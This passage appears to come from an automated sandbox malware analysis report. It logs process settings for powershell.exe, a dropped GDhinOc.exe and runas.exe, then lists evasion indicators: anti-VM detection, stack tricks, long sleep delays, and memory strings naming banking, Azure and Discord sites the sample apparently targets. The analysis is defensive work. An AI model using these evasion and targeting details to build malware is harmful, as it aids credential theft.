                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: nK1Y86mbzfbkwpB.exe PID: 5040, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: GDhinOc.exe PID: 6420, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeMemory allocated: C10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeMemory allocated: 27B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeMemory allocated: 47B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeMemory allocated: 75A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeMemory allocated: 70E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeMemory allocated: 85A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeMemory allocated: 95A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeMemory allocated: E10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeMemory allocated: 2AB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeMemory allocated: FA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeMemory allocated: 70C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeMemory allocated: 80C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeMemory allocated: 8250000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeMemory allocated: 9250000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D096E rdtsc 7_2_014D096E
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8621Jump to behavior
                Source: C:\Windows\SysWOW64\runas.exeWindow / User API: threadDelayed 9839Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.3 %
                Source: C:\Windows\SysWOW64\runas.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe TID: 64Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1804Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe TID: 5276Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\runas.exe TID: 2436Thread sleep count: 133 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\runas.exe TID: 2436Thread sleep time: -266000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\runas.exe TID: 2436Thread sleep count: 9839 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\runas.exe TID: 2436Thread sleep time: -19678000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe TID: 4068Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runas.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runas.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023BC330 FindFirstFileW,FindNextFileW,FindClose,17_2_023BC330
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 023115.17.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tVMware20,11696487552
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,116964875,
                Source: 023115.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 023115.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 023115.17.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 023115.17.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 023115.17.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000002.2184155901.0000000007461000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: 023115.17.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 023115.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 023115.17.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: 023115.17.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 023115.17.drBinary or memory string: global block list test formVMware20,11696487552
                Source: runas.exe, 00000011.00000002.3352619446.0000000002807000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,116964875523
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552J
                Source: 023115.17.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: 023115.17.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: hAtMBptzWt.exe, 00000016.00000002.3355415751.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2942583225.000001BDD664C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 023115.17.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 023115.17.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 023115.17.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552}
                Source: 023115.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
